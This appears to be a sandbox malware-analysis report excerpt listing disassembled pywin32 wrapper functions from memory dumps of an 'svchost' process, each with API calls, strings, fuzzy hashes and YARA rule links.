                            Uniqueness Score: -1.00%

                            Function 6DAAE1E0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowTextLength), ref: 6DAAE1F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE213
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE222
                            • GetWindowTextLengthW.USER32(?), ref: 6DAAE22E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE237
                            • Py_BuildValue.PYTHON38(6DABC9C8,00000000), ref: 6DAAE243
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildLengthObject_ParseRestoreSaveTextTupleU_object@@ValueWindow
                            • String ID: O:GetWindowTextLength
                            • API String ID: 59582451-886137146
                            • Opcode ID: 709f257073b8c430fc202384fb52a739fc56bc355d5f5e95acadc34d82f65db6
                            • Instruction ID: a83625365207e0ad60e76efcd57a7c6aa9566afaba050a55ff24e554907fac98
                            • Opcode Fuzzy Hash: 709f257073b8c430fc202384fb52a739fc56bc355d5f5e95acadc34d82f65db6
                            • Instruction Fuzzy Hash: 51F06D35408200AFDF006B799C4DB6A7BB8FF85216F488628F884C1121E735896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB45C0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetArcDirection), ref: 6DAB45D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB45F3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4602
                            • GetArcDirection.GDI32(?), ref: 6DAB460E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4617
                            • Py_BuildValue.PYTHON38(6DAC208C,00000000), ref: 6DAB4623
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildDirectionObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetArcDirection
                            • API String ID: 2979142542-430125826
                            • Opcode ID: f41ee74c4d539e4b71b9c74090e74d6117ec02a6c11f47874d8023e4b03642ab
                            • Instruction ID: a2a90f4699441d80d06caca769a6dfcfd4cd7e4e934c6bbd08886d4fd2d40740
                            • Opcode Fuzzy Hash: f41ee74c4d539e4b71b9c74090e74d6117ec02a6c11f47874d8023e4b03642ab
                            • Instruction Fuzzy Hash: 0DF06D35408201AFCF006F65AC49B6B7BB8EF85216F048629F985C1131E7358D6BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA95D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetGraphicsMode,?,?), ref: 6DAA95E6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9602
                            • SetGraphicsMode.GDI32(?,?), ref: 6DAA9617
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetGraphicsMode,00000000), ref: 6DAA9627
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@GraphicsModeObject_ParseTupleWin_
                            • String ID: Oi:SetGraphicsMode$SetGraphicsMode
                            • API String ID: 470607977-859440876
                            • Opcode ID: bd1897f45807e455762ec8db6a266c311f0ce029389beb5075d609bb5cc8f65f
                            • Instruction ID: 99dfc9e0ba411d2ed58fc38458e348c7c30ff7165559a6ec255efdb924dfeaec
                            • Opcode Fuzzy Hash: bd1897f45807e455762ec8db6a266c311f0ce029389beb5075d609bb5cc8f65f
                            • Instruction Fuzzy Hash: CFF062B540C202AFDB005B64ED45A6B7BBCBF80605F888634FD49C0021F736CA6ADA53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7900, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:IsWindow), ref: 6DAB7917
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7933
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB7942
                            • IsWindow.USER32(?), ref: 6DAB794E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB7957
                            • Py_BuildValue.PYTHON38(6DABDF64,00000000), ref: 6DAB7963
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildObject_ParseRestoreSaveTupleU_object@@ValueWindow
                            • String ID: O:IsWindow
                            • API String ID: 2950490389-3791401007
                            • Opcode ID: 9c76a0961b94ccff192253b293c588d636755b799fb8fee0812d6a881c66d904
                            • Instruction ID: 003ae6e4bae6471cc891634d29d6a6739d50473ee42669e7a89bb3c16c3929c4
                            • Opcode Fuzzy Hash: 9c76a0961b94ccff192253b293c588d636755b799fb8fee0812d6a881c66d904
                            • Instruction Fuzzy Hash: 20F06D3580C201AFCF007B759C49A6A7FB9EF85216F048928FD85C1131F735886BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB48A0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetBkColor), ref: 6DAB48B7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB48D3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB48E2
                            • GetBkColor.GDI32(?), ref: 6DAB48EE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB48F7
                            • Py_BuildValue.PYTHON38(6DABBB68,00000000), ref: 6DAB4903
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildColorObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetBkColor
                            • API String ID: 4268770495-1635627287
                            • Opcode ID: fc2ae16f13e55617344d32dafb9270334964725b5eac50a58eb5d9f303dd4255
                            • Instruction ID: 8ff957bbeb932d1bd1204d44948ca2714c95a9572f3c717c55ac17a902352edc
                            • Opcode Fuzzy Hash: fc2ae16f13e55617344d32dafb9270334964725b5eac50a58eb5d9f303dd4255
                            • Instruction Fuzzy Hash: A2F0963540C201AFCF006F65DC49B6B7BB8EF85255F448635FC85C1131E735886BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB30B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetMenuItemCount), ref: 6DAB30C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB30E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB30F2
                            • GetMenuItemCount.USER32 ref: 6DAB30FE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3107
                            • Py_BuildValue.PYTHON38(6DABDE5C,00000000), ref: 6DAB3113
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildCountItemMenuObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetMenuItemCount
                            • API String ID: 2075901184-2628613766
                            • Opcode ID: cdce060d8dbfc32fdc8503547a514fc6fcc34dadda78864af0522d86b494c7c3
                            • Instruction ID: 47a414d09d781febac3edb7a13847e4a22b977d63cad70442820e3add7c2f5bc
                            • Opcode Fuzzy Hash: cdce060d8dbfc32fdc8503547a514fc6fcc34dadda78864af0522d86b494c7c3
                            • Instruction Fuzzy Hash: ABF06D35408200AFCF006B659C49B6B7BB9EF85256F088938FD85C1131E735886BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF080, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetStretchBltMode), ref: 6DAAF097
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF0B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF0C2
                            • GetStretchBltMode.GDI32(?), ref: 6DAAF0CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF0D7
                            • Py_BuildValue.PYTHON38(6DABF234,00000000), ref: 6DAAF0E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildModeObject_ParseRestoreSaveStretchTupleU_object@@Value
                            • String ID: O:GetStretchBltMode
                            • API String ID: 3252888681-3771220208
                            • Opcode ID: dc95635ca08ac99db0cc086ee9fad3cbf0fc6f96dab72e7a4a779a22904e3243
                            • Instruction ID: fdc018417c7bd9ce0c8833e226f57eb4342ee729ffecab63cc88684bdf0a8a5a
                            • Opcode Fuzzy Hash: dc95635ca08ac99db0cc086ee9fad3cbf0fc6f96dab72e7a4a779a22904e3243
                            • Instruction Fuzzy Hash: 08F06239408201AFDF006B65DC49A6A7BB8EF81211F084629FD84C1131F735896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA94E0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetMapMode,?,?), ref: 6DAA94F6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9512
                            • SetMapMode.GDI32(?,?), ref: 6DAA9527
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetMapMode,00000000), ref: 6DAA9537
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@ModeObject_ParseTupleWin_
                            • String ID: Oi:SetMapMode$SetMapMode
                            • API String ID: 862032445-3191041298
                            • Opcode ID: ea3f997fad294f46ee80928b0ec56086899b4f1840c7168e05f4450e4106aec7
                            • Instruction ID: 2c42ab698c3b8a697f73372f5bc3e38266ee2e8329361479e3b9429dbabc6307
                            • Opcode Fuzzy Hash: ea3f997fad294f46ee80928b0ec56086899b4f1840c7168e05f4450e4106aec7
                            • Instruction Fuzzy Hash: B5F012B540C202AFDB005B64ED45A7B77BDBE44605F888634FD89C1121F736CB6E9A53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAFC80, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:MessageBeep), ref: 6DAAFC8E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAFC9F
                            • MessageBeep.USER32(?), ref: 6DAAFCAB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAFCB4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MessageBeep,00000000), ref: 6DAAFCCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BeepError@@MessageParseRestoreSaveTupleU_object@@Win_
                            • String ID: MessageBeep$i:MessageBeep
                            • API String ID: 3242808027-2496439102
                            • Opcode ID: 9f52a9c2022c75db22491a8215c6721becfce0d1e244708004aecd1f04ae2f8b
                            • Instruction ID: 0a6a374e6fde9a746b641b088173f30725cb2ef67faf966173d557faffbabd93
                            • Opcode Fuzzy Hash: 9f52a9c2022c75db22491a8215c6721becfce0d1e244708004aecd1f04ae2f8b
                            • Instruction Fuzzy Hash: 9FF082729082019FCF055F659C88B6A3B79FF81366F184629FC43D2522E7308867AB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9560, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetGraphicsMode), ref: 6DAA9570
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA958C
                            • GetGraphicsMode.GDI32(?), ref: 6DAA959D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetGraphicsMode,00000000), ref: 6DAA95AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@GraphicsModeObject_ParseTupleWin_
                            • String ID: GetGraphicsMode$O:GetGraphicsMode
                            • API String ID: 470607977-3708336259
                            • Opcode ID: d6cde6a4075a0be9d3f0de3e096a7b07c34ab266106501b4175205f944390a5a
                            • Instruction ID: 09281258dc308bedcf318b42afb8d517380dde9e48d716ed22b4d61ac6efaa17
                            • Opcode Fuzzy Hash: d6cde6a4075a0be9d3f0de3e096a7b07c34ab266106501b4175205f944390a5a
                            • Instruction Fuzzy Hash: 46F0FBB480C2016FDF006B35AD46A267AB9BE41546F8C4634FC45C1121F736CA6EDA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA917E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:MsgWaitForMultipleObjects,?,?,?), ref: 6DA91817
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91839
                            • PyErr_Occurred.PYTHON38 ref: 6DA91845
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91853
                            • PyErr_Occurred.PYTHON38 ref: 6DA9185F
                            Strings
                            • OiOO:MsgWaitForMultipleObjects, xrefs: 6DA9180E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Err_LongLong_MaskOccurredUnsigned$Arg_ParseTuple
                            • String ID: OiOO:MsgWaitForMultipleObjects
                            • API String ID: 2081558781-495829860
                            • Opcode ID: d6d8d4df102f6da92a0f01fafda0b462409dac1c9971cfb2c31b4d59c7e70fb0
                            • Instruction ID: f460ffb1b05b328a3964466e7bd5e5e7198c1ee01e08444056e8714d419e5032
                            • Opcode Fuzzy Hash: d6d8d4df102f6da92a0f01fafda0b462409dac1c9971cfb2c31b4d59c7e70fb0
                            • Instruction Fuzzy Hash: A411597510C3026BD7009B28DC00B7BB7FCEBC4324F548A39F864812A0F779D5585663
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9880, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,XFORM must be a dict), ref: 6DAA98AD
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAA98BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: XFORM must be a dict$|ffffff
                            • API String ID: 3492737308-2058357693
                            • Opcode ID: c5ff35178bb4bda137ad7aa34715428ea9378f9b88bd3269d5442d50ff78fc88
                            • Instruction ID: 829f725ea5475ae52cc22554e0b2e90ff2efd9098db91f43a8f6a47a60c3de03
                            • Opcode Fuzzy Hash: c5ff35178bb4bda137ad7aa34715428ea9378f9b88bd3269d5442d50ff78fc88
                            • Instruction Fuzzy Hash: 7011A1B6908701AFC7108B94DCC0E97B7FCFF86321B08472AF556C6121E731E99697A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC110, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,MINIMIZEDMETRICS must be a dict), ref: 6DAAC145
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAC156
                            Strings
                            • MINIMIZEDMETRICS must be a dict, xrefs: 6DAAC13E
                            • iiii:MINIMIZEDMETRICS, xrefs: 6DAAC17E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: MINIMIZEDMETRICS must be a dict$iiii:MINIMIZEDMETRICS
                            • API String ID: 3492737308-89025194
                            • Opcode ID: b7d645bd8f2b68dfc17f5ecfcb43bdd54cf00db1f4c694fec849b6f044bbd8a1
                            • Instruction ID: 4c592ff41907dfcebd1b10b28a1520741cc6f63c65b89d0747aeaebff19de884
                            • Opcode Fuzzy Hash: b7d645bd8f2b68dfc17f5ecfcb43bdd54cf00db1f4c694fec849b6f044bbd8a1
                            • Instruction Fuzzy Hash: EC11CEB66083019FD7108F98D880E93B7B8FF81331F08472AF556C7121E330A4969BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9920, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            • Py_BuildValue.PYTHON38({s:f,s:f,s:f,s:f,s:f,s:f},M11,?,M12,?,M21,?,M22,?,6DABD298,?,6DABD294), ref: 6DAA99A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: BuildValue
                            • String ID: M11$M12$M21$M22${s:f,s:f,s:f,s:f,s:f,s:f}
                            • API String ID: 3383912721-503291249
                            • Opcode ID: d897dc85211c21d54dcb20212d36ccf6118e2aaf5392c664f9f4c9eaeb833090
                            • Instruction ID: 09b44cc4273a6edd6cd9026c7c2feaba8b225d30a9129f76e84d1b56898be64d
                            • Opcode Fuzzy Hash: d897dc85211c21d54dcb20212d36ccf6118e2aaf5392c664f9f4c9eaeb833090
                            • Instruction Fuzzy Hash: 41012C34D28A458EC601EE3A8914869FB79BEDF101B458729F4827D022F72494CADB83
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91DA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ReleaseMutex), ref: 6DA91DB7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91DD3
                            • ReleaseMutex.KERNEL32(?), ref: 6DA91DE4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ReleaseMutex,00000000), ref: 6DA91DF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@MutexObject_ParseReleaseTupleWin_
                            • String ID: O:ReleaseMutex$ReleaseMutex
                            • API String ID: 1893467422-470454261
                            • Opcode ID: 6b2df3e31e6e215ec83d73cc7419d6a3479d87d220510633eccda6112f0ddf23
                            • Instruction ID: 673051fe33f6f31fcc2f7d5172b8780cad255051ac13005dea92418cffe7ebb7
                            • Opcode Fuzzy Hash: 6b2df3e31e6e215ec83d73cc7419d6a3479d87d220510633eccda6112f0ddf23
                            • Instruction Fuzzy Hash: 91F0B47442C201AFDF006B14ED0573A37F8FF85206F444434FC94C9111F776856ADA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA913B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34timeCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CancelWaitableTimer), ref: 6DA913C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA913E3
                            • CancelWaitableTimer.KERNEL32(?), ref: 6DA913F4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CancelWaitableTimer,00000000), ref: 6DA91404
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_CancelError@@Object_ParseTimerTupleWaitableWin_
                            • String ID: CancelWaitableTimer$O:CancelWaitableTimer
                            • API String ID: 2426573516-3766281208
                            • Opcode ID: ae24a565fb7491a688067f38c3a00b2e2f707c440366338e274cb184b5efe134
                            • Instruction ID: fe1dfe772aa0d316b096abda825c82a837433a0b127c260d1ee5dd66a29235d7
                            • Opcode Fuzzy Hash: ae24a565fb7491a688067f38c3a00b2e2f707c440366338e274cb184b5efe134
                            • Instruction Fuzzy Hash: D5F0F07802C2019FCF005B25EC0573637F8BF49206F444434EC58C4111F7798529DA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

